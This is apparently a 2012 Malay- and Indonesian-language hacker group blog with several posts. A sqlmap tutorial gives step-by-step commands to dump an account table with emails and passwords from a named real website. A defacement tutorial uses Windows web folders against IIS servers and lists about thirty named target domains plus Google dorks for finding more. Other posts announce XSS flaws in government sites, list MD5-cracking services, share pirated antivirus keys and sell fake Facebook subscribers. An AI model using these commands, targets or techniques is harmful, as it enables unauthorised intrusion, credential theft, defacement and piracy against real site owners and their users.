Thursday, 26 July 2012

Lagi XSS Vulnerability Di Website Government Malaysia

Posted by Malaya Hackers at 01:54

XSS Vulnerability Di Website Government Malaysia

 

Screenshot :



  Proof of Concept :
  http://semak.spr.gov.my/



+---------------------------------------------------+
   Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ]
[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]
-----------------------------------------------------+

CyberSEC © 2012 All rights reserved.
0 comments

Tuesday, 24 July 2012

Trick panggilan percuma tanpa batas/Nokia user

Posted by Malaya Hackers at 15:12
Trick panggilan percuma tanpa batas/Nokia user

Assalamualaikum..semoga sobat sekalian sihat-sihat semuanya..

harini saya akan berbagi trick panggilan percuma tanpa batas menggunakan handphone nokia terbaru admin Tin99i

untuk tidak buang masa kita langsung je.. tutorialnya senang banget.. silakan perhatikan baik-baik gambar di bawah..pastikan alat-alat tempurnya sama persis dengan gambar kat bawah tu..ok senang tak?

Pesan admin>biar trick ni tidak cepat di block mana-mana operator telko jadi janganlah hambur trick ni di luar sana ye..cukuplah berbagi trick ni dengan kekasih kesayangan anda.. Ok!

Semoga sukses dan enjoy selalu.. Jom!!!gayuttt.. sepuas-puasnya hehe..



0 comments

Tuesday, 10 July 2012

XSS Vulnerability pada Website Kerajaan Indonesia

Posted by Malaya Hackers at 02:38

XSS Vulnerability pada Website Kerajaan Indonesia :)

Screenshot :





Proof of Concept :


Sekecil apew pon vuln pada website, pasti kalau dibiarkan terus/x pernah dipatch  msti menjadi sasaran hacker dan  attacker yang tidak bertanggungjawab.

Sekian post kali ni tentang XSS Vulnerability pada Website KERAJAAN INDONESIA semoga korang dapat sedikit ilmu  :)
 
#Anggap ni sbgai pelajaran je tau xD :P
0 comments

Monday, 9 July 2012

sql map tutorial by dotmy crew

Posted by Malaya Hackers at 18:51

SQLMAP FORM DotMy Crew...

 

 


 Assalamualaikum semue. hari nie nak buat tutor sal sqlmap


Ok jom start

Sblom tue, barang2 yang perlu korang ade



1-Download Python 2.7 ( http://www.python.org/ftp/python/2.7.2/python-2.7.2.msi )



2-Download Sqlmap ( http://sqlmap.sourceforge.net/ )



3-CMD (same jea dgn command prompt)



4-vuln website



ok mule2 pgy ke local disk c. Buat satu folder dan namakannya sqlmap



Sekarang extract file sqlmap yang kite da download tady ke dalam folder sqlmap

Ok set.



Sekarang buka cmd

untuk kali nie saye akan menggunakan vuln website berupa nie http://www.mmbuildings.com/newsitem.php?id=61



Ok skarang di cmd buka dan type

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61



ok skarang kalau mengikut website yang saye pilih tady akan kluar due option iaitu Y/N

ok type N

skarang sqlmap akn shutdown



Type nie pula

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 --dbs

kalau anda ikut step by step anda sepatutnya akan dapat database

Database yang saye dapat berupa

*mm_mm

*information_schema <-------yang nie kite ta nak

Jadi kite akan pilih mm_mm <------comel la plak...hehe

Macamne kite na pilih??

Type nie c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm --tables

Tgu dy scan jap <-----boleh minum kopi ntuk mengelakkan rase bosan



Skarang kite akan nampak tables

Jadi skarang saye akan pilih tables account (ingat setiap website mempunyai tables yang berlainan)

Type dalam cmd

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --columns

Yes. Sekarang dah nampak 3 columns iaitu email id login access dan password! :D



Jadi saye akan ambil ke 3 3 nye (WOOHOO)

Type nie plak

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --dump

Wow! ade email n pass n id







Pastue nak buatpe?? Pk2 la sdry (cary la login page n Enjoy!)



Saye mgambil mase yang lame menulis tutor ini jadi kalau nak gne jgn lpe credit kpade saye !





Originally by .:: Prince Kira Shc ::.
1 comments

DEFACE WEBSITE DGN SENANG

Posted by Malaya Hackers at 16:33
DEFACE WEBSITE DGN SENANG, BG KORANG YG X THU APE  ITU DEFACE..DEFACE NI KITE KACAU WEBSITE ORG..CM TU LAH.. Di Kategorikan Sebagai Hack jgk lah.. >,<

Kita mungkin pernah melihat halaman yang terkena aksi jahil terhadap situs tertentu oleh para defacer.
Lalu di dalam hati akan bertanya-tanya bagaimana cara melakukan itu??.
Mungkin kamu pernah membaca artikel tentang cara men-deface website dengan menggunakan teknik XSS, SQLi, LFI, RFI dll.
Namun percayalah, selain teknik tersebut masih ada teknik lain yang jauh lebih sederhana semudah copy paste file. 


CTH :


Bagaimana caranya??, yaitu dengan menggunakan web folder yang disediakan oleh OS Windows sendiri.
Namun perlu diketahui, teknik ini hanya berlaku untuk website yang menggunakan OS Windows dan server IIS 5.0/6.0 .

Lalu bagaimana cara mengetahui bahwa target kita menggunakan server IIS?
Mudah saja, silakan buka netcraft.com dan masukkan target kita ke textbox yang tersedia, maka akan kita dapatkan informasi website tersebut, termasuk OS dan server yang digunakan.
Jika kamu ingin mendapatkan target secara acak bisa menggunakan google dork dengan menggunakan keyword allinurl:*.asp , allinurl:*.aspx dan sebagainya.

 OK, langsung kita mulai saja tutorialnya.

1. Buka My Computer lalu lihat icon web folder, lalu klik 2x icon web folder tersebut (Win 98/ME/2000).
Jika kamu menggunakan windows XP secara default tidak akan menemukan folder tersebut di My Computer, tapi kamu bisa membuat secara manual dengan membuat shortcut baru.

Berikut langkahnya :
- Klik kanan pada desktop, kemudian pilih New -> Shortcut .
- Maka akan ada popup yang meminta untuk memasukkan lokasi tujuan, lalu kamu masukkan alamat dibawah ini :


%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
- Jika sudah silakan klik Next -> Next -> Finish.
- Jika shortcut nya sudah terbentuk, lalu klik 2x pada shortcut tersebut.

 



3. Lalu akan muncul popup yang meminta untuk memasukkan alamat tujuan. Sebagai contoh kamu masukkan http://www.aslty.com.cn sebagai target. 

 
4. Kemudian klik Next dan tunggu sampai prosesnya selesai, lama tidaknya proses tergantung koneksi internetmu.

5. Buka folder yang sudah terbentuk, nama folder biasanya mengambil dari nama domain, jika domainnya adalah http://www.aslty.com.cn , maka nama foldernya juga http://www.aslty.com.cn.



6. Copy paste sebuah file html [ DEFACE FILE KORANG ] ke dalam web folder yang telah kamu buat ke folder www.aslty.com.cn.

7. Jika proses copy paste selesai, sebagai contoh jika nama file kamu adalah “Raja_T3g4.htm” maka cara melihatnya adalah dengan membuka browser dan mengetikkan alamat http://www.aslty.com.cn/Raja_T3g4.htm



Nie ane kasih kumpulan websitenya biar mudah :
zgsfjw.net
centro.anje.pt
www.ziangli.com
6.shicheng.gov.cn
www.ville-mordelles.fr
www.podiocom.com
www.journeezerotracas.fr
www.journeezerotracas.com
www.journee0tracas.com
www.comune.torrice.fr.it
www.chinamaster88.com
www.chateaudelepinay.fr
www.centroformazioneitalia.it
www.bjautoobd.com
www.autodiagtool.com
usa.automotormaster.com
so-sighty.fr
perros-guirec.icor.fr
myhealthcity.com
malaysiahealthcareindonesia.com
lapetitehublais.fr
handistar.fr
gz.autoobd-ii.com
gz.automotormaster.com
expert-comptable-35.fr
carrelages-palmieri.com
camion-road-show.com
autoobd.cn
hibis.co.id
www.zjgsxy.com


Kalau mau dapet website lebih lainnya bisa di dork di google :

inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js.cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp
inurl:.zj.cn/*.asp
inurl:.ac.cn/*.asp
inurl:.com.cn/*.asp
inurl:.edu.cn/*.asp
inurl:.gov.cn/*.asp
inurl:.net.cn/*.asp
inurl:.org.cn/*.asp


Catatan : Saya mempraktekan metode ini dengan windows XP, dan setelah di coba ternyata bisa di gunakan di semua Windows XP.
Saran saya adalah , Gunakan ilmu yang anda peroleh untuk kebaikan , karena baik dan buruknya tergantung dari pribadi masing masing.


Don't Learn to Hack, but Hack to Learn 

Mungkin segini dulu bro, selebihnya akan saya tambahkan lain waktu ☻semoga bermanfaat.













KREDIT TO : MizanGanuz
0 comments

sell facebook auto subscribes

Posted by Malaya Hackers at 02:55
NEWS UPDATE AUTO SUBSCRIBES 09/07/2012 ..WE SELL 1K SUBSCRIBES IN RM100..WE NOT TEACH..JUST DO TO YOUR ACCOUNT..U CANT PM DIRECT  Ijai Jai  [ MALAYSIAN ONLY].







Support By  Malaysian Blackh4t Community
0 comments

Sunday, 8 July 2012

Md5 Hash Server List

Posted by Malaya Hackers at 03:04

Md5 Hash Server List

 

 


Biggest MD5 crack databases
-----------------------------------------------------------------
MOST BIGGEST SITE OF MD5 DECRYPING
-----------------------------------------------------------------

- http://www.hash-cracker.com (40,000,000)

- http://www.cmd5.com/english.aspx (457,354,352,282)

- http://www.md5crack.com

- http://www.hashchecker.com

- http://md5cracker.tk/ (MD5 Search engine by searches a total of 14 on-line crackers.)

- http://www.md5decrypter.com (5,889,729)

- http://md5.rednoize.com (56,502,235)

- http://www.tmto.org/?category=main&page=search_md5 (306.000.000.000)

- http://www.milw0rm.com/cracker/insert.php (Milw0rm Cracker db)

- http://blacklight.gotdns.org/cracker/crack.php (2,456,288)

- http://www.shell-storm.org/md5 ( The data base currently contains 169582 passwords )

- http://md5.xpzone.de (Need Account)

- http://passcracking.com/ (Register to increase your priority)

- http://www.xmd5.org

- Perl Script: MD5 Brute Forcer

-----------------------------------------------------------------
CRACKED PASSWORD LIST
-----------------------------------------------------------------
http://www.md5oogle.com/md5hashes.php
http://www.hashchecker.com/?_sls=hash_list&_from=1
http://www.milw0rm.com/cracker/list.php
http://darkc0de.com/database/cracked.txt

-----------------------------------------------------------------
RAINBOW TABLE
-----------------------------------------------------------------
http://www.freerainbowtables.com/en/download/
http://www.rainbowtables.net/


0 comments

Kaspersky Internet Security 2012 KEYS 2014

Posted by Malaya Hackers at 02:33

Kaspersky Internet Security 2012 KEYS 2014 (692 days)

 info

 

Kaspersky Internet Security 2012 KEYS 2014 (692 days) 64 bit/32bit Size : 447.17KB

 

How to Insert KEYS ? :

 Turn off/Disconnect your internet connection ===================================================================== 

1. Click “Manage License” From Right Bottom of Kaspersky, Then click “Activate the application”  

2. DELETE old license at first [IF ANY]  

3. Enter key: 11111-11111-11111-1111X  

4. Click on Next  

5. Click on Browse  

6. Specify the path to any key (file) from the Keys folder  

7. Click on Next  

8. After activation, Turn on/Connect internet  

9. Update virus definitions once/twice in a week to avoid key block

10. Enjoy it ! 

 

 

 

 

 

 

 Download Kaspersky Internet Security 2012 KEYS 2014 (692 days) :

 filesin [fast]: CLICK HERE

or

restfile: CLICK HERE -.RAR

 

Credit To : MizanGanuZ

 

0 comments

Saturday, 7 July 2012

fix fb block liking 60days

Posted by Malaya Hackers at 22:11 

IF U BLOCKED TO [LIKE] PAGES 60DAYS BY FACEBOOK TEAM, 
"USE THIS BOT..THIS BOT HELP U DELETED ALL LIKE IN YOUR ACCOUNT".
"SHARE THIS TO ALL YOUR FRIENDS"."

USE THIS BOT TO KILLS ALL LIKE SPAM : CLICK HERE
0 comments
Subscribe to: Comments (Atom)
 
Malaysian Blackh4t | Copyright © 2012 | Designer Template by Fizz | MachoCyberSec & Malaysian Blogger™ & edited by : My-Blackh4t Community